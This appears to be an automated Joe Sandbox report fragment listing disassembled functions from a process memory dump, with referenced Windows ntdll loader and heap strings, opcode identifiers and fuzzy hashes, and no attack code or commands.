                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                        • API String ID: 0-258546922
                                                                                                                                                                                                        • Opcode ID: f2dda3657a3847f25a45fdd9e2dd3a2cf354946dfc50270081c2c3427903780c
                                                                                                                                                                                                        • Instruction ID: f06641ea72791ab4aa6ade23b2a51831bc6e9115b16530bb1a649bb8949e1e4a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2dda3657a3847f25a45fdd9e2dd3a2cf354946dfc50270081c2c3427903780c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3EF12C72D41229EBDB16DF98C980AEEBBBCFF19714F14406AE501E7210E7709F418B91
                                                                                                                                                                                                        Function 0180A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                        • API String ID: 0-379654539
                                                                                                                                                                                                        • Opcode ID: 4cfcb0f5a937818602be7d605f0a002258a5b8b20b0d3b4e3b7e05992b0ca376
                                                                                                                                                                                                        • Instruction ID: a96858d6933c1ec436218e9a95d299ea91201596d5d9a3d62cc9790bc276a3d4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cfcb0f5a937818602be7d605f0a002258a5b8b20b0d3b4e3b7e05992b0ca376
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AEC1BC7410838ACFD76ACF58C880B6AB7E4FF84708F044969F986DB291E374CA45CB52
                                                                                                                                                                                                        Function 01838322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01838341
                                                                                                                                                                                                        • @, xrefs: 018384B1
                                                                                                                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0183847E
                                                                                                                                                                                                        • LdrpInitializeProcess, xrefs: 01838342
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                        • API String ID: 0-1918872054
                                                                                                                                                                                                        • Opcode ID: 658b58b2f9f09fe36f1bb69e239ce3168ab0983f0281672da00b6fd7f5dc1f15
                                                                                                                                                                                                        • Instruction ID: 3551f4eff74f7756c131ae80b9a5f3b7dda84bbd5e034d873ab4e3ab337b97c1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 658b58b2f9f09fe36f1bb69e239ce3168ab0983f0281672da00b6fd7f5dc1f15
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85919D71148349AFD722DE65C880FABBBECAB85754F440A2DFA84D2151E734DA44CBA3
                                                                                                                                                                                                        Function 018063CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01860DEC
                                                                                                                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01860EB5
                                                                                                                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01860E72
                                                                                                                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01860E2F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                                        • API String ID: 0-1468400865
                                                                                                                                                                                                        • Opcode ID: b3fdcf3ad85f4b2204eb49914d3092f90e7daf6a7548f4554c7319985cdc49c7
                                                                                                                                                                                                        • Instruction ID: a965b703b0bb7a7cd99896ca292d9132ce0c9f10368a166d68146eabbcdfc154
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3fdcf3ad85f4b2204eb49914d3092f90e7daf6a7548f4554c7319985cdc49c7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A71F2719047099FCBA2EF18C880B9B7BA9AF95754F500568FD48CA186D734D284CB92
                                                                                                                                                                                                        Function 017FF5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                                                                        • API String ID: 2994545307-2586055223
                                                                                                                                                                                                        • Opcode ID: 7e071f34b671519310c4674f10439b052447649da1a9de855ee75579c7d5685a
                                                                                                                                                                                                        • Instruction ID: fe2d698f1930e60f0f989fa8bdde5dc0c0720c753876834676b2a6135b9b7085
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e071f34b671519310c4674f10439b052447649da1a9de855ee75579c7d5685a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A61B3722446419FE722DB68CC45F67FBE9EF84B50F080499FA55CB391DA34EA04C762
                                                                                                                                                                                                        Function 0182237A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0186A7AF
                                                                                                                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0186A79F
                                                                                                                                                                                                        • LdrpDynamicShimModule, xrefs: 0186A7A5
                                                                                                                                                                                                        • apphelp.dll, xrefs: 01822382
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                        • API String ID: 0-176724104
                                                                                                                                                                                                        • Opcode ID: 9312bb0ad9ec65124d5d016e1699c02bc6932fddf6160ce8111a10859b63efb4
                                                                                                                                                                                                        • Instruction ID: 5e3505fdf098b9bc16b445df02d2eaf7e59b995256758000a4590fea9be55554
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9312bb0ad9ec65124d5d016e1699c02bc6932fddf6160ce8111a10859b63efb4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60314A72A00205AFEB35AF5DD885E6A77B9FB84B04F14006DE901F7355DB745B81CB50
                                                                                                                                                                                                        Function 017F90F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                                        • API String ID: 2994545307-1391187441
                                                                                                                                                                                                        • Opcode ID: 06e53baf4370a931ac4382539115a2edc73f4b7609f831effc1d967c35b421e2
                                                                                                                                                                                                        • Instruction ID: b2dd0694f2c443935ad26e6a6b818c08c772c0819e5f23dbcae3c021f2c793e4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06e53baf4370a931ac4382539115a2edc73f4b7609f831effc1d967c35b421e2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E831C172A00109EFDB11DB59CC88F9BFBB9EB447B4F144069FA15AB391D670EA40CA61
                                                                                                                                                                                                        Function 018A9060 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: $ $0
                                                                                                                                                                                                        • API String ID: 0-3352262554
                                                                                                                                                                                                        • Opcode ID: 824a7fa24def9fce0deddfea47253ad5ea6275cfdf7f619a75bb5f0ecda9ee5c
                                                                                                                                                                                                        • Instruction ID: 1c080853b1766a402edd228a8d70e12ed4e66eb0875d0c12d59e6b5548f359df
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 824a7fa24def9fce0deddfea47253ad5ea6275cfdf7f619a75bb5f0ecda9ee5c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F3202B1A087858FE360CF68C484B5BBBE5BB88348F44492EF599C7251D774EA48CB52
                                                                                                                                                                                                        Function 01801380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • HEAP: , xrefs: 018014B6
                                                                                                                                                                                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01801648
                                                                                                                                                                                                        • HEAP[%wZ]: , xrefs: 01801632
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                        • API String ID: 0-3178619729
                                                                                                                                                                                                        • Opcode ID: 1a4c9ea64ea34c994cd942bc1d0befeb19c4c52d450b9d170b2ad59b6ce81124
                                                                                                                                                                                                        • Instruction ID: 78679744cc6186243ad7c782806162d240edd7d085428a2a63d0c57622d34c47
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a4c9ea64ea34c994cd942bc1d0befeb19c4c52d450b9d170b2ad59b6ce81124
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83E1E3306046499FDB6ACF6CC89967ABBF1FF44324F18845DE996CB286D734DA40CB50
                                                                                                                                                                                                        Function 0182F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018700F1
                                                                                                                                                                                                        • RTL: Re-Waiting, xrefs: 01870128
                                                                                                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018700C7
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                        • API String ID: 0-2474120054
                                                                                                                                                                                                        • Opcode ID: 3cead8e91bb08f9ef09acc8ea9dad1a971ba27d4f130e6139408b2799a20d1ce
                                                                                                                                                                                                        • Instruction ID: 15e14fc741aed3c12ebc3c179f5bd9c4dae7b2da0dd3bb9f80fad15177802c01
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3cead8e91bb08f9ef09acc8ea9dad1a971ba27d4f130e6139408b2799a20d1ce
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CE1AC706087419FD726CF28C844B1ABBF1BB45328F140A5DF6A5CB2E1D774DA84CB52
                                                                                                                                                                                                        Function 0180B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                                                                                        • API String ID: 0-1145731471
                                                                                                                                                                                                        • Opcode ID: 27b72719a75f792ce3a99e60a97441c905ddb32053ef90ab406da3f6787a1916
                                                                                                                                                                                                        • Instruction ID: 0a0a2a5bd5c9f809e55a8bac563649bc212662ad3597ffc6fd6c87174c0edc3d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27b72719a75f792ce3a99e60a97441c905ddb32053ef90ab406da3f6787a1916
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AB17C75A006098FDB26CF69C890BAEBBB9BF44714F188529ED15EB791D730EE40CB10
                                                                                                                                                                                                        Function 0188330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                                                        • API String ID: 0-2391371766
                                                                                                                                                                                                        • Opcode ID: a9687db628bd234dfa9e0a225b58b55e5b50f01784b103674972d580b3a2ced8
                                                                                                                                                                                                        • Instruction ID: 52428911f5a1af336b7a4e156e65344f1c57cdd2b902b623d9c8eb20f960808e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9687db628bd234dfa9e0a225b58b55e5b50f01784b103674972d580b3a2ced8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AB17F71604345AFE322EF58D884F6BB7E8BB44B14F100929FE50DB291DB71EA448B92
                                                                                                                                                                                                        Function 017FA147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                        • API String ID: 0-2779062949
                                                                                                                                                                                                        • Opcode ID: f87caeb2b5cc017288392c1161dc1cf75f0fb38983cf5555e6a90e8c3c19cca5
                                                                                                                                                                                                        • Instruction ID: fdd5a6c5b382b3a0865639d09db3cf5444ea2eb7b6e69ce443e097e1c4f466d3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f87caeb2b5cc017288392c1161dc1cf75f0fb38983cf5555e6a90e8c3c19cca5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1A16B719016299BDB71DF28CC88BAAB7B8EF04714F1005EAEA09E7250DB359F85CF50
                                                                                                                                                                                                        Function 0189327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                                                                                                        • API String ID: 0-318774311
                                                                                                                                                                                                        • Opcode ID: b7b5f5a23a372b968f613dc98fc48029848be1f80e8369ce9a467dd3d30280ef
                                                                                                                                                                                                        • Instruction ID: c090c68ca0057c084d3f54ee723b444c455a65b67b95de7a3e8c0a9938169ded
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7b5f5a23a372b968f613dc98fc48029848be1f80e8369ce9a467dd3d30280ef
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35819071248345AFEB21DB68D884B6ABBE8FF84754F080929FD51D7390DB74DA00CB52
                                                                                                                                                                                                        Function 0180B360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                                        • API String ID: 0-373624363
                                                                                                                                                                                                        • Opcode ID: ec8d5046345d8722945ead9701ae6ed71cb421dc0f2ee4c1283b9eeaf80ba2d2
                                                                                                                                                                                                        • Instruction ID: edd9f7b3bba17a7366fec35d73380bbceff06eba83311dbcf994c922e5bd53e3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec8d5046345d8722945ead9701ae6ed71cb421dc0f2ee4c1283b9eeaf80ba2d2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2591AC35A0465DCBEB22CF58C8407AEBBB4FF01328F194199E915EB2D1D3799B80CB91
                                                                                                                                                                                                        Function 018DB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • GlobalizationUserSettings, xrefs: 018DB3B4
                                                                                                                                                                                                        • TargetNtPath, xrefs: 018DB3AF
                                                                                                                                                                                                        • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 018DB3AA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                                                        • API String ID: 0-505981995
                                                                                                                                                                                                        • Opcode ID: 29efbfb660d51ec1c375c535d9f45447794a91c5115a3de7aa5e31979cc29d65
                                                                                                                                                                                                        • Instruction ID: 1258182e2970f621d88c5774b139024540e4ea8fb1fcb38ac9ec6877e10000a1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29efbfb660d51ec1c375c535d9f45447794a91c5115a3de7aa5e31979cc29d65
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03614072941329ABDB31DF58DC88B99B7B8AB15714F4101E9AA08E7250DB74DF84CF90
                                                                                                                                                                                                        Function 01829723 Relevance: 3.9, Strings: 3, Instructions: 179COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                        • API String ID: 0-2283098728
                                                                                                                                                                                                        • Opcode ID: 2be08952adf5847c5555ce844c3b699fd4a5fd0bc91e0e8071cafbd447b0ee39
                                                                                                                                                                                                        • Instruction ID: bee2dbef6455a38bb76f33ec1222b342a2b86cb524c83e0bc8c1377a673c5536
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2be08952adf5847c5555ce844c3b699fd4a5fd0bc91e0e8071cafbd447b0ee39
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05512871B003329FD726EF3CC884B29B7A5BB94718F18062DE552C7295E7B49780CB92
                                                                                                                                                                                                        Function 017FF75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • HEAP: , xrefs: 0185E442
                                                                                                                                                                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0185E455
                                                                                                                                                                                                        • HEAP[%wZ]: , xrefs: 0185E435
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                                        • API String ID: 0-1340214556
                                                                                                                                                                                                        • Opcode ID: 80d52cdc257fc16d2e718b2156f6e5f65541a5b8c33605d88983a4092ed2ea6b
                                                                                                                                                                                                        • Instruction ID: 37e4df2832b17792c61abfca7759137caa99e614502dffff7f47ab6eb47f4c97
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80d52cdc257fc16d2e718b2156f6e5f65541a5b8c33605d88983a4092ed2ea6b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7051D332644685AFE712DBA8C884BAAFBF8FF05714F0440A9EA41CB752D774EB04CB51
                                                                                                                                                                                                        Function 01821514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • LdrpCompleteMapModule, xrefs: 0186A39D
                                                                                                                                                                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 0186A396
                                                                                                                                                                                                        • minkernel\ntdll\ldrmap.c, xrefs: 0186A3A7
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                                        • API String ID: 0-1676968949
                                                                                                                                                                                                        • Opcode ID: ca9970e9771ceaf878f8bc4431a827a9fb47243cadc420b02a48a4aef3cee80b
                                                                                                                                                                                                        • Instruction ID: 7a6a114214653d3371f630174ac88ca9231ef7c5272e12fe386a7391878df2f4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca9970e9771ceaf878f8bc4431a827a9fb47243cadc420b02a48a4aef3cee80b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D51E8316007559BE727CF5CCA48B25BBE9BB04714F280194F952DB6D2D774EB80CB41
                                                                                                                                                                                                        Function 017F753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                                                        • API String ID: 0-1151232445
                                                                                                                                                                                                        • Opcode ID: 339ae7c4ba72d2eed58cfbef9ad83b7cdda4441a3796120ab54ee41dc1e0217a
                                                                                                                                                                                                        • Instruction ID: 3470acf232138912a6f6d8a043821d60d863fed0964d1ba930598cf0dd8f65bb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 339ae7c4ba72d2eed58cfbef9ad83b7cdda4441a3796120ab54ee41dc1e0217a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6841E2342002808FEF6DDA1CC4D8BB7BBA1DF01345F2845ADDA86CB756CA65D645CB21
                                                                                                                                                                                                        Function 018315EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • LdrpAllocateTls, xrefs: 0187194A
                                                                                                                                                                                                        • minkernel\ntdll\ldrtls.c, xrefs: 01871954
                                                                                                                                                                                                        • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 01871943
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
